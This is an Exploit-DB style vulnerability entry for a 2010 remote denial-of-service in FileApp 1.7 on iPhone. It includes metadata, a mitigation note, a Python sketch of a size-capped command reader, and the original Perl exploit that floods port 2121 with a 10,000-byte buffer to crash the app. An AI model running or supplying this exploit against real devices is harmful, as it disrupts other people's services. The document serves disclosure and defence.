Vendor: FileApp
By: Ale46
CVSS: 7.5 (HIGH)
Denial of Service (DoS)
CWE: 400
Product Name: FileApp
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Related CWE: N/A
CPE: a:digidna:fileapp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iPhone 3GS with 3.1.2 firmware
Year: 2010

FileApp – Remote DoS Exploit

This exploit crashes the FileApp application on an iPhone 3GS with 3.1.2 firmware. It sends a large amount of data to the application's port 2121, causing the app to crash and the device to return to the SpringBoard.

Mitigation:

Disable the application's listener on port 2121, or limit the amount of data that can be sent to it.
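
A sketch of the second mitigation, limiting how much data the listener will accept, as an added example (not FileApp's code and not part of the original advisory). It assumes the service on port 2121 reads newline-terminated commands; the 512-byte cap, the 5-second timeout and all names are illustrative.

```python
import socket

MAX_LINE = 512   # assumed per-command cap, not a value taken from FileApp
TIMEOUT = 5.0    # assumed idle limit in seconds


class LineTooLong(Exception):
    """Peer sent more than the cap without a line terminator."""


class BoundedLineReader:
    """Reads newline-terminated commands while holding at most max_line + 1 bytes."""

    def __init__(self, conn, max_line=MAX_LINE, timeout=TIMEOUT):
        conn.settimeout(timeout)  # a silent peer cannot pin the handler
        self.conn, self.max_line, self.buf = conn, max_line, bytearray()

    def readline(self):
        """Return one command without its terminator, or None once the peer closes."""
        while True:
            nl = self.buf.find(b"\n")
            if nl != -1:
                line = bytes(self.buf[:nl]).rstrip(b"\r")
                del self.buf[:nl + 1]  # keep pipelined commands for the next call
                return line
            if len(self.buf) > self.max_line:
                raise LineTooLong(len(self.buf))
            # Request only what still fits under the cap, plus one byte to detect overflow.
            chunk = self.conn.recv(self.max_line + 1 - len(self.buf))
            if not chunk:
                return None
            self.buf += chunk


def serve_client(conn):
    """Return (accepted_commands, reason_the_session_ended) for one connection."""
    reader, accepted, reason = BoundedLineReader(conn), [], "closed"
    try:
        while (line := reader.readline()) is not None:
            accepted.append(line)
    except LineTooLong:
        reason = "line too long"  # drop the client instead of buffering more
    except socket.timeout:
        reason = "timeout"
    finally:
        conn.close()
    return accepted, reason
```

The reader never asks the socket for more than the cap plus one byte, so an unterminated stream is rejected after 513 bytes however much the peer tries to send.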

Exploit-DB raw data:

#!/usr/bin/perl
#
# Exploit: FileApp - Remote Dos Exploit
# Date: 17/02/10
# Author: Ale46
# Software Link: http://www.digidna.net/products/fileapp
# Version: 1.7
# Tested on: Iphone 3GS with 3.1.2 firmware
# Go in the sharing section of FileApp and run this script, the
# application crashes and your iPhone\iPod returns to the SpringBoard

use IO::Socket;

if (@ARGV<1){
        print ("Usage: ./fileapp <server_ip>\n");
        exit();
    }

my $host = $ARGV[0];
my $port = 2121;
my $stuff = "A"*10000;
my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => $port);
unless ($socket) { die "Can\'t connect to $host" }
print "Sending evil buffer..\n";
sleep(2);
print $socket $stuff;
sleep(1);
print "Now your app is.. Dosed :D";